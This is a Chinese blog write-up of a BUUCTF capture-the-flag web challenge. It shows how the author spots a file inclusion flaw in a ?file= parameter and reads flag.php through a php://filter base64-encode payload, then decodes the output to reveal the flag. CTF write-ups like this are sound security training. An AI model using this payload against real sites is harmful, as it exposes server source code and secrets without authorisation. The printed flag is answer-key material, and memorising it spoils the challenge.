

buuctf-[ACTF2020 新生赛]Include 1（小宇特详解）

原创

周星星ZY 于 2022-01-15 20:25:38 发布 20 收藏

文章标签：[安全](#) [php](#) [web安全](#)

版权声明：本文为博主原创文章，遵循 [CC 4.0 BY-SA](#) 版权协议，转载请附上原文出处链接和本声明。

本文链接：<https://blog.csdn.net/xhy18634297976/article/details/122515374>

版权

buuctf-[ACTF2020 新生赛]Include 1（小宇特详解）

点击tips



<https://blog.csdn.net/xhy18634297976>



<https://blog.csdn.net/xhy18634297976>

这里url是?file=flag.php

猜测是文件包含漏洞

这里构造payload

```
?file=php://filter/read=convert.base64-encode/resource=flag.php
```



<https://blog.csdn.net/xhy18634297976>

将

PD9waHAKZWNobyAiQ2FulHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YTVMOTJmNjEiNTY2Yy00OWE3LTlhN2UtNzIzYzI5OTMwZjZkfQo=

base64解码

Base64.us Base64 在线编码解码 (最好用的 Base64 在线工具)

Base64 | URLEncode | MD5 | TimeStamp

请输入要进行 Base64 编码或解码的字符

```
PD9waHAKZWNobyAiQ2FulHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YTVMOTJmNjEiNTY2Yy00OWE3LTlhN2UtNzIzYzI5OTMwZjZkfQo=
```

编码 (Encode) **解码 (Decode)** **↕ 交换** (编码快捷键: **Ctrl** + **Enter**)

Base64 编码或解码的结果: 编/解码后自动全选

```
<?php  
echo "Can you find out the flag?";  
//flag{a5f92f61-566c-49a7-9a7e-723c29930f6d}  
|
```

解码完毕。复制结果 生成固定链接

也可以选择图片文件来获取它的 Base64 编码的 Data URI 形式:

<https://blog.csdn.net/why18634297976>